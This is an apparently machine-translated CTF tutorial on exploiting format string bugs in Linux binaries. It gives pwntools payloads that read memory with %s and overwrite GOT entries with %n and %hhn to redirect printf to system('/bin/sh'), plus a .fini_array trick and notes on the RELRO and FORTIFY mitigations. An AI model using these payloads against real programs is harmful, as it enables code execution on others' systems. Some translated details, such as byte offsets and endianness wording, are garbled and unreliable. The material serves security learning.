How to format string vulnerabilities in Linux pwn 07/16 Update SLTechnology News&Howtos

How to format string vulnerabilities in Linux pwn

2025-07-16 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Network Security >

Shulou(Shulou.com)05/31 Report--

In this issue, the editor will bring you loopholes about how to format strings in Linux pwn. The article is rich in content and analyzes and narrates it from a professional point of view. I hope you can get something after reading this article.

Vulnerabilities in 0x00 printf function

Printf function family is a common function family in C programming. Generally speaking, we will use the form of printf ([format string], parameter) to make the call, for example

Char s [20] = "Hello world!\ n"; printf ("% s", s)

However, sometimes it will be written to save trouble.

Char s [20] = "Hello world!\ n"; printf (s)

In fact, this is a very dangerous way to write. Due to the design flaw of the printf function family, when its first parameter can be controlled, the attacker will have the opportunity to read and write to any memory address.

0x01 uses formatted string vulnerability to realize arbitrary address reading

First of all, let's look at a simple example written by ourselves ~ / format_x86/format_x86. This is a program with very simple code. In order to keep the back door, I called the system function to write a showVersion (). All that's left is a wireless loop to read and write and call printf () in a questionable way. Normally, everything we enter is output as is, but the output changes when we enter certain characters.

As you can see, when we enter a format string that printf recognizes, printf parses it as a format string and outputs it. The principle is very simple, such as printf ("% s", "Hello world") will parse the first parameter% s as a formatted string parameter, here because we directly use printf to output a variable, when the variable also happens to be a formatted string, it will naturally be parsed by printf. So what is the following output? Let's go on with the experiment.

We directly drop the breakpoint on the call _ printf line, then start the program in debug mode, and then enter a long string of% x. the output is shown in the figure.

At this point, the stack is as shown in the figure. It is easy to find that the output is just a stream of data that esp-4 starts to go down. So in theory, we can get a limited range of stack data by superimposing% x. So is it possible for us to disclose other data? We know that there is% s in the format string, which is used to output characters. In essence, it reads the corresponding parameters and parses them as pointers to obtain the string output of the corresponding address. Let's enter a% s observation first.

We see that the output% s is followed by a line break, and the corresponding stack and data are as follows:

At the top of the stack is the first parameter, which is the% s we entered. The address of the second parameter is the same as the first parameter, and the address resolution points to% s and enter 0x0A. Since we can control the stack by input at this time, we can enter an address and let% s correspond to this address exactly, so as to output the string pointed to by the address and read any address.

After just debugging, we can find that our input starts with the sixth parameter (the figure above counts the sixth '000A7325' =% s\ n\ x00 from the top of the stack). So we can construct the string "\ X01\ x80\ x04\ x08%x.%x.%x.%x.%s". The address in front of here is the address loaded by the ELF file, 08048000. why not 08048000 later? if you are interested, you can try it yourself.

Since unwritable characters are included in the string, we can't type them directly, so this time we debug them with pwntools+IDA attachment.

We successfully leaked the contents of the address 0x08048001.

After the experiment just now, the payload we used to disclose the specified address should be understandable to the reader. Since our input ontology happens to be in the position of the sixth parameter of the printf read parameter, we place the address at the beginning so that it is treated by printf as the sixth parameter. The next step is to format the string, using% x to get rid of the second to fifth parameters (our input address is the first parameter), and using% s to resolve the sixth parameter as the address. But what if the input length is limited and our input is outside the tenth parameter of the printf? Overlaying% x is obviously not realistic. So we need to use another feature of the formatted string.

The format string can be specified to handle the nth parameter using a special representation. For example, the output fifth parameter can be written as% 4$ s, the sixth parameter can be written as% 5$ s, and the nth parameter that needs to be output is% (nmur1) $[format controller]. So our payload can be simplified to "\ x01\ x80\ x04\ x08% 5$ s"

0x02 uses formatted string vulnerability to write arbitrarily

Although we can use the format string vulnerability to achieve arbitrary address read, but we can not directly read to exploit the vulnerability getshell, we need to write any address. So in this section we will introduce another feature of formatted strings-writing using printf.

Printf has a special formatting control character% n, which, unlike other formatting characters that control the format and content of the output, writes the number of characters output to the memory of the corresponding parameter. We change payload to "\ x8c\ x97\ x04\ x08% 5$ n", where 0804978c is the first address of the .bss section and is a writable address. The content in the address before execution is that after the 0printf execution, the content in the address becomes 4. Looking at the output, it is found that four characters "\ x8c\ x97\ x04\ x08" have been output, and carriage return is not counted. We changed payload to "\ x8c\ x97\ x04\ x08%2048c%5$ n" again, and successfully changed the contents of 0804978c to 0x804.

Now that we have verified the read and write of any address, we can construct exp to take shell.

Since we can write at any address and there is a system function in the program, we can directly choose to hijack a function whose got entry is the plt entry of system, thus executing system ("/ bin/sh"). Which one is hijacked? We found that there are only four functions in the got table, and the printf function can be called with a single argument, and the parameters happen to be entered by us. So we can hijack printf to system, and then read "/ bin/sh" through read again, and printf ("/ bin/sh") will become system ("/ bin/sh"). Based on the previous arbitrary address writing experiment, it is easy to construct a payload as follows:

Printf_got = 0x08049778system_plt = 0x08048320payload = p32 (printf_got) + "%" + str (system_plt-4) + "c% 5$ n" p32 (printf_got) occupies 4 bytes, so system_plt subtracts 4 bytes

If you send the payload, you can find that the printf entry in the got table has been hijacked

Send "/ bin/sh" again at this time and you can get the shell.

But there is another problem. If the reader really debugs it himself, he will find that the call _ printf line takes an extra long time to execute in a single step, and the cursor on the screen will keep flashing for a long time when io.interactive (), outputting a large number of empty characters. Use io.recvall () to read these characters and find that the amount of data is up to 128.28MB. This is because our payload will output as many as 134513436 characters.

Since all of our experiments are conducted between the local / virtual machine and the docker, we are not affected by the network environment. In the actual competition and vulnerability exploitation environment, one-time transmission of such a large amount of data may lead to network stutter or even disconnection. Therefore, we have to change the way to write exp.

We know that there are% lld,% llx and other ways to represent four-word (qword) length data under 64 bits, while symmetrically, we can also use% hd,% hhx to represent word (word) and byte (byte) length data, corresponding to% n is% hn,% hhn. In order to prevent the program from crashing due to the wrong modified address, we still need to change the printf entry in the got table at once, so we have to modify four bytes at a time when using% hhn. Then we have to restructure the payload.

First, let's add four bytes to payload to modify.

Printf_got = 0x08049778system_plt = 0x08048320payload = p32 (printf_got) payload + = p32 (printf_got+1) payload + = p32 (printf_got+2) payload + = p32 (printf_got+3)

Then let's modify the first one. Since x86 and x86-64 are both large end sequences, printf_got should correspond to the last two 0x20 of the address.

Payload + = "%" payload + = str (0x20-16) payload + = "c% 5$ hhn"

At this point, we have changed the data at 0x08049778 to 0x20, and then we need to change the data at 0x08049778+2 to 0x83. Since we have output 0x20 bytes (16-byte address + 0x20-16% c), we also need to output 0x83-0x20 bytes

Payload + = "%" payload + = str (0x83-0x20) payload + = "c% 6$ hhn"

To continue to modify 0x08049778+4, we need to change it to 0x04, but we have already output 0x83 bytes, so we need to output to 0x04+0x100=0x104 bytes, truncated to 0x04

Payload + = "%" payload + = str (0x104-0x83) payload + = "c% 7$ hhn"

Modify 0x08049778+6

Payload + = "%" payload + = str (0x08-0x04) payload + = "c% 8$ hhn"

The last payload is'\ x78\ x97\ x04\ x08\ x79\ x97\ x04\ x08\ x7a\ x97\ x04\ x08\ x7b\ x97\ x04\ x08c%5$ hhn%99c%6 $hhn9c%7$ hhn%4c%8$ hhn'

Of course, for the format string payload,pwntools also provides a direct use of the class Fmtstr, the specific documentation, see http://docs.pwntools.com/en/stable/fmtstr.html, our more commonly used function is fmtstr_payload (offset, {address:data}, numbwritten=0, write_size='byte'). The first parameter, offset, is the first controllable stack offset (excluding the formatted string parameter). The example we put in is the sixth parameter, so it is 5. The second dictionary can be understood by looking at the name. Numbwritten refers to the data output by printf before formatting the string, such as printf ("Hello [var]"). At this time, "Hello" has been output a total of six characters before the controllable variable, and the parameter value should be set to 6. The fourth choice is% hhn (byte),% hn (word) or% n (dword). In our example, it can be written as fmtstr_payload (5, {printf_got:system_plt}).

The script to get this example shell can be found in the attachment and will not be repeated here.

Format string vulnerability exploitation under 0x03 64-bit

After learning the format string vulnerability exploitation under 32-bit, let's continue to look at 64-bit programs that have now become mainstream. Let's open the example ~ / format_x86-64/format_x86-64. In fact, this program is the same code file as the example used in the previous section, but compiled into 64-bit form. As in the previous example, let's first look at the controllable stack address offset. According to the previous example, our input is at the top of the stack, so it is the first parameter, and the offset should be 0. 0. But the question is, shouldn't there be a string address at the top of the stack? Don't forget that the order of passing parameters for 64 bits is rdi, rsi, rdx, rcx, R8, R9, and then the stack, so the offset here should be 6. We can use a string of% llx. To prove it. With the offset, the printf in the got table and the system in the plt table can also be obtained directly from the program, and we can use fmtstr_payload to generate the payload. However, we will find that this payload cannot change the printf entry in the got table to the system of plt, but look at the memory and find that there is no problem with payload, so what is the problem? Let's take a look at the output of printf

You can see that the payload we typed for the first time has only three characters: spaces (\ x20),\ x10 and `(\ x60). Why is that?

When we look back at payload, it's easy to see that immediately after the three characters\ x20\ x10\ x60 is\ x00, which is the end of the string symbol, which is why we chose 0x08048001 instead of 0x08048000 test reading in the previous section. Since the high-order memory addresses visible to users under 64-bit have\ x00 (64-bit addresses have a total of 16 hexadecimal digits), it is obviously not feasible to use the previous method of constructing payload, so we need to adjust the payload and put the address at the end of the payload.

Because there is\ x00 in the address, it cannot be written in% hhn segment this time, so our payload structure is as follows

Offset = 6printf_got = 0x00601020system_plt = 0x00400460payload = "%" + str (system_plt) + "c% 6$ lln" + p64 (printf_got)

The payload looks fine, but if you test it, you will find that the program crashes immediately after reading the output with io.recvall (). Why is that? If you look carefully at the stack in the lower right corner, you will find that the constructed address is misplaced.

So we also need to adjust the payload so that the data in front of the address is exactly a multiple of the address length. Of course, the offset where the address is located has to be adjusted. The adjusted results are as follows:

Offset = 8printf_got = 0x00601020system_plt = 0x00400460payload = "a%" + str (system_plt-1) + "c% 6$ lln" + p64 (printf_got)

This time will be fine.

0x04 uses format string vulnerabilities to make the program loop indefinitely

From the above two examples, we can find that the successful exploitation of the format string vulnerability getshell is often due to the existence of loops in the program. What if there is no loop in the program? We have previously tried to use ROP technology to hijack functions to return addresses to start, and this time we will use the format string vulnerability to do this.

Let's open the example ~ / MMA CTF 2nd 2016-greeting/greeting

Similarly, the 32-bit program has system in its got table (see left), and there is a format string vulnerability. The steps for calculating the offset value and constructing the payload in detail are not repeated here. The main problem with this program is that we need to use printf to trigger the vulnerability, but we can see from the code that printf will not call functions in other got tables after execution, which means that even if the vulnerability is successfully triggered to hijack the got table, it will not be able to execute system. At this point, we need to find a way to get the program to cycle again.

As we mentioned in the previous article, although we write code with the main function as the program entry, but when compiled into the program, the entry is not the main function, but the start code snippet. In fact, the start code snippet also calls _ _ libc_start_main to do some initialization work, and finally calls the main function and does some processing after the main function ends. The process can be found in the link http://dbp-consulting.com/tutorials/debugging/linuxProgramStartup.html.

To put it simply in the following figure, each function pointer in the function array of the .init section code and the .init _ array section is called before the main function. Similarly, after the end of the main function, each function pointer in the function array of the .fini section code and the .fini. _ arrary section is called.

Our goal is to change the first element of the .fini _ array array to start. It should be noted that the contents of this array will be modified after being executed again from start, and the number of bytes that the program can read is limited, so you need to modify two addresses at once and adjust the payload reasonably. The available scripts can also be found in the attachment.

Some vulnerability mitigation mechanisms related to formatted string vulnerabilities in 0x05

In the checks for checksec scripts, we mentioned the role of NX earlier. In this section, we introduce two other mitigation mechanisms, RELRO and FORTIFY, that are commonly used to exploit formatting string vulnerabilities in Linux pwn. First, we introduce that RELRO,RELRO is an acronym for read-only relocation table (Relocation Read Only). The relocation table is the got table and the plt table in the ELF file that we often mention. The source and function of these two tables will be described in detail in the article introducing ret2dl-resolve. The first thing we need to know now are these two tables, as the name suggests, for functions and variables outside the program (functions and variables that are not defined and implemented in the program, such as read. Obviously you don't have to write an implementation of the read function to prepare for the relocation when you call the read function in your own code. Due to the additional performance overhead of relocation, programs generally use deferred loading for optimization reasons, that is, the memory address of an external function is found and filled in the got table the first time it is called (for example, the read function, the first call is the first time the program executes call read). Therefore, the got table must be writable. But the writable got table also brings a very convenient way to exploit the format string vulnerability, that is, to modify the got table. As mentioned in the previous article, we can change the got entry of a function (such as puts) to the address of the system function through a vulnerability, so that we actually call system when we execute call puts, and accordingly, the parameters passed in are given to system, so that we can execute system ("/ bin/sh"). A program that can do this uses checksec to check the results as follows

Its RELRO term is Partial RELRO.

The RELRO: Full RELRO shown at the beginning of the diagram means that all the relocation table entries of the program are read-only, neither .got nor .got.plt can be modified. We find this program (in the exercise of "stack canary and Bypass ideas"), at the upper and lower breakpoint of call read, change the first parameter buf to the address of the got table to try to modify the got table, the program will not report an error, but the data has not been modified, the read function returns a-1

Obviously, when Full RELRO protection is turned on, attempts to hijack got tables through vulnerabilities, including format string vulnerabilities, will be blocked.

Next, we introduce another rare protection measure, FORTIFY, which is a source-level protection mechanism implemented by GCC. Its function is to check the source code at compile time to avoid potential buffer overflow errors. To put it simply, after adding this protection (add the parameter-D_FORTIFY_SOURCE=2 at compile time) some sensitive functions such as read, fgets, memcpy, printf, etc., which may cause vulnerabilities will be replaced with _ _ read_chk, _ _ fgets_chk, _ _ memcpy_chk, _ _ printf_chk, and so on. These functions with chk check whether the read / copied byte length exceeds the buffer length, and avoid vulnerabilities by checking whether string positions such as% n are at writable addresses that may be modified by the user, avoiding format strings skipping certain parameters (such as direct% 7$ x). Programs with FORTIFY protection turned on will be checked out by checksec. In addition, looking at the got table directly during disassembly will also find the existence of the chk function.

The above is the loophole in how to format strings in Linux pwn shared by Xiaobian. If you happen to have similar doubts, please refer to the above analysis to understand. If you want to know more about it, you are welcome to follow the industry information channel.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.

*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.